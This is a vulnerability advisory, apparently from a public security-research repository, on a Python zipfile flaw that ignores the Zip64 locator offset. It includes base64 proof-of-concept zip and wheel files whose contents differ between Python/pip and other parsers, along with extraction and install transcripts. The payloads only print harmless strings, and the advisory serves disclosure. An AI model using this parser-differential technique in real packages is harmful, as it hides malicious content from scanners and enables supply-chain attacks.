**security-research** Public
– ### Uh oh!
There was an error while loading. Please reload this page.
– 499
# Python – Zip64 Locator Offset Vulnerability
## Package
## Affected versions
## Patched versions
## Description
### Summary
It is possible to craft a zip file that, when parsed by Python’s zipfile implementation, returns contents that are different from other common zip implementations. This is achieved because Python ignores the offset in the Zip64 locator record. Instead Python’s implementation expects to see the Zip64 end-of-central-directory record immediately prior to the Zip64 locator record, and ignores the offset entirely. This means two Zip64 end-of-central-directory records can be present. One that is pointed to by the offset in the Zip64 locator record, and the other that sits prior to the Zip64 locator record.
In order for this to be exploitable, user interaction is required. An attack using this technique would require different zip parsing implementations to be used at different times during the handling of the zip file. For example, Python Wheel files and “uv”.
### Severity
Moderate – This vulnerability can be leveraged to hide malicious content that evades detection.
### Proof of Concept
#### Single File Zip
The following base64 encoded string is a specially crafted zip file that serves as a simple proof-of-concept.
“`
$ echo “UEsDBBQAAAAAAAAAIQBLlVV3CwAAAAsAAAALAAAAYm9yaW5nX2ZpbGVub3QgcHl0aG9uClBLAQIUAxQAAAAAAAAAIQBLlVV3CwAAAAsAAAALAAAAAAAAAAAAAAC0AQAAAABib3JpbmdfZmlsZVBLBgYsAAAAAAAAAC0ALQAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAA5AAAAAAAAADQAAAAAAAAAUEsDBBQAAAAAAAAAIQBh7IWUCgAAAAoAAAAHAAAAcHlfZmlsZWlzIHB5dGhvbgpQSwECFAMUAAAAAAAAACEAYeyFlAoAAAAKAAAABwAAAAAAAAAAAAAAtAGlAAAAcHlfZmlsZVBLBgYsAAAAAAAAAC0ALQAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAA1AAAAAAAAANQAAAAAAAAAUEsGBwAAAABtAAAAAAAAAAEAAABQSwUGAAAAAAEAAQA5AAAANAAAAAAA” | base64 -d > poc.zip
“`
When unzipped in Python a file called py_file with the contents “is python” will be returned.
When unzipped with other zip implementations, a file called boring_file with the contents “not python” will be returned.
Extracting with Python:
“`
$ mkdir ~/py && cd ~/py $ python3 -c “import zipfile; zipfile.ZipFile(‘../poc.zip’).extractall()” $ ls py_file $ cat py_file is python
“`
Extracting with unzip (InfoZip):
“`
$ mkdir ~/unzip && cd ~/unzip $ unzip ../poc.zip Archive: ../poc.zip extracting: boring_file $ cat boring_file not python
“`
Implementations that output boring_file include:
– Go
– java.util.zip (seek and streaming)
– InfoZip (unzip)
– MiniZip (zlib)
– PHP
– zip + async_zip Rust crates (seek and streaming)
– Yauzl (npm)
– net.lingala.zip4j (Maven)
– libarchive (bsdunzip)
#### Wheel
The following base64 encoded string is a specially crafted wheel file, that further demonstrates the flaw and a potential attack scenario.
“`
$ echo “UEsDBBQAAAAAAAAAIQAi5N7ufAAAAHwAAAAlAAAAY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9NRVRBREFUQU1ldGFkYXRhLVZlcnNpb246IDIuNApOYW1lOiBjYndoZWVsemlwNjQKVmVyc2lvbjogMC4wLjEKU3VtbWFyeTogTW9yZSBteXN0ZXJpZXMKQXV0aG9yLWVtYWlsOiBDYWxlYiA8Y2FsZWJicm93bkBnb29nbGUuY29tPgpQSwMEFAAAAAAAAAAhAN1AXn1kAAAAZAAAACIAAABjYndoZWVsemlwNjQtMC4wLjEuZGlzdC1pbmZvL1dIRUVMV2hlZWwtVmVyc2lvbjogMS4wCkdlbmVyYXRvcjogZmxpdCAzLjEyLjAKUm9vdC1Jcy1QdXJlbGliOiB0cnVlClRhZzogcHkyLW5vbmUtYW55ClRhZzogcHkzLW5vbmUtYW55ClBLAwQUAAAAAAAAACEAXL6g5HABAABwAQAAIwAAAGNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vUkVDT1JEY2J3aGVlbHppcDY0L19faW5pdF9fLnB5LHNoYTI1Nj01NTU0ZWNiZTNmOTYyMjk4Mzc3NDE1NzdhZTJkMmYyODVmMTUwOTYxOThmYWViZGFhYTFmNDVmMTlkMzQ5YjQwLDIxCmNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vV0hFRUwsc2hhMjU2PTBmMmI3YTQ4MTdkYTZhYzU4NDk1NGFkNDQ2NDkyNzU0NTAxOTBjNzQ5M2MzMTgzNzNkYTRmMzZiYjQ1MjZlNDYsMTAwCmNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vTUVUQURBVEEsc2hhMjU2PTkwNDc2ZGUxNDFiYzc4NzA0YjQzY2I4NjBhNDIzYTFmYTA0ZmU1NTc1ODQ3MjZhNzUxMWQyYTk0MTkyYzlmOTMsMTI0CmNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vUkVDT1JELCwwMDAzNjhQSwMEFAAAAAAAAAAhAAnQ9UkVAAAAFQAAABgAAABjYndoZWVsemlwNjQvX19pbml0X18ucHlwcmludCgibWFnaWMiKQojINaEk5lQSwECFAMUAAAAAAAAACEAIuTe7nwAAAB8AAAAJQAAAAAAAAAAAAAAtAEAAAAAY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9NRVRBREFUQVBLAQIUAxQAAAAAAAAAIQDdQF59ZAAAAGQAAAAiAAAAAAAAAAAAAAC0Ab8AAABjYndoZWVsemlwNjQtMC4wLjEuZGlzdC1pbmZvL1dIRUVMUEsBAhQDFAAAAAAAAAAhAFy+oORwAQAAcAEAACMAAAAAAAAAAAAAALQBYwEAAGNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vUkVDT1JEUEsBAhQDFAAAAAAAAAAhAAnQ9UkVAAAAFQAAABgAAAAAAAAAAAAAALQBFAMAAGNid2hlZWx6aXA2NC9fX2luaXRfXy5weVBLBgaaAwAAAAAAAC0ALQAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAA6AQAAAAAAAF8DAAAAAAAAUEsDBBQAAAAAAAAAIQBcvqDkcAEAAHABAAAjAAAAY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9SRUNPUkRjYndoZWVsemlwNjQvX19pbml0X18ucHksc2hhMjU2PTAxZjBhMDZjOTUxNTMyNGMxYzcwYmQ0YjQ3Yjg1NWRkNWRmMzg4ZTBlNmU4OWNlZDg4OGY2ODFmNGU3NTY3ZWYsMjEKY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9XSEVFTCxzaGEyNTY9MGYyYjdhNDgxN2RhNmFjNTg0OTU0YWQ0NDY0OTI3NTQ1MDE5MGM3NDkzYzMxODM3M2RhNGYzNmJiNDUyNmU0NiwxMDAKY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9NRVRBREFUQSxzaGEyNTY9OTA0NzZkZTE0MWJjNzg3MDRiNDNjYjg2MGE0MjNhMWZhMDRmZTU1NzU4NDcyNmE3NTExZDJhOTQxOTJjOWY5MywxMjQKY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9SRUNPUkQsLDAwaRpgClBLAwQUAAAAAAAAACEACdD1SRUAAAAVAAAAGAAAAGNid2hlZWx6aXA2NC9fX2luaXRfXy5weXByaW50KCJtb3JlIG1hZ2ljISIpClBLAQIUAxQAAAAAAAAAIQAi5N7ufAAAAHwAAAAlAAAAAAAAAAAAAAC0AQAAAABjYndoZWVsemlwNjQtMC4wLjEuZGlzdC1pbmZvL01FVEFEQVRBUEsBAhQDFAAAAAAAAAAhAN1AXn1kAAAAZAAAACIAAAAAAAAAAAAAALQBvwAAAGNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vV0hFRUxQSwECFAMUAAAAAAAAACEAXL6g5HABAABwAQAAIwAAAAAAAAAAAAAAtAHRBAAAY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9SRUNPUkRQSwECFAMUAAAAAAAAACEACdD1SRUAAAAVAAAAGAAAAAAAAAAAAAAAtAGCBgAAY2J3aGVlbHppcDY0L19faW5pdF9fLnB5UEsGBiwAAAAAAAAALQAtAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAADoBAAAAAAAAzQYAAAAAAABQSwYHAAAAAJkEAAAAAAAAAQAAAFBLBQYAAAAABAAEADoBAABfAwAAAAA=” | base64 -d > cbwheelzip64-0.0.1-py2.py3-none-any.whl
“`
Installing with uv:
“`
$ mkdir uv && cd uv $ uv venv env $ . env/bin/activate $ uv pip install ../cbwheelzip64-0.0.1-py2.py3-none-any.whl Using Python 3.12.3 environment at: env Resolved 1 package in 3ms Installed 1 package in 1ms + cbwheelzip64==0.0.1 (from file:///home/calebbrown/cbwheelzip64-0.0.1-py2.py3-none-any.whl) $ python3 -c ‘import cbwheelzip64’ magic
“`
installing with pip:
“`
$ mkdir py && cd py $ python3 -m venv env $ . env/bin/activate $ pip install ../cbwheelzip64-0.0.1-py2.py3-none-any.whl Processing /home/calebbrown/cbwheelzip64-0.0.1-py2.py3-none-any.whl Installing collected packages: cbwheelzip64 Successfully installed cbwheelzip64-0.0.1 $ python3 -c ‘import cbwheelzip64’ more magic!
“`
### Further Analysis
“`
# cpython/Lib/zipfile/__init__.py @ 6bf1c0ab3497b1b193812654bcdfd0c11b4192d8 # Simplified implementation, removing conditions and error handling. def _EndRecData64(fpin, offset, endrec): fpin.seek(offset – sizeEndCentDir64Locator, 2) data = fpin.read(sizeEndCentDir64Locator) sig, diskno, reloff, disks = struct.unpack(structEndArchive64Locator, data) # Assume no ‘zip64 extensible data’ fpin.seek(offset – sizeEndCentDir64Locator – sizeEndCentDir64, 2) data = fpin.read(sizeEndCentDir64) # …
“`
The above code snippet is the current logic used to read the zip64 end-of-central-directory record.
`sizeEndCentDir64Locator` and `sizeEndCentDir64` are both constants derived from the `struct.calcsize` on import.
When reading the zip64 end-of-central-directory the zip64 locator record ( `reloff`) is ignored entirely, and instead the offset is calculated from the record size constants.
The comment “Assume no ‘zip64 extensible data'” seems to suggest this “fixed offset” behaviour is intentional, as reading the “zip64 extensible data” field would require treating the zip64 end-of-central-directory record as having a variable size.
However by making this assumption, Python’s zip implementation now differs from the majority of other implementations, which do use the offset from the zip64 locator record.
Finally, the assumption of no extensible data is not validated. `reloff` is not checked to ensure that it corresponds to the position of the zip64 end-of-central-directory record that is actually read. This means that `reloff` can point to a separate zip64 end-of-central-directory record that returns different content to the one read by Python.
### Timeline
**Date reported**: 07/28/2025
**Date fixed**:
**Date disclosed**: 10/27/2026
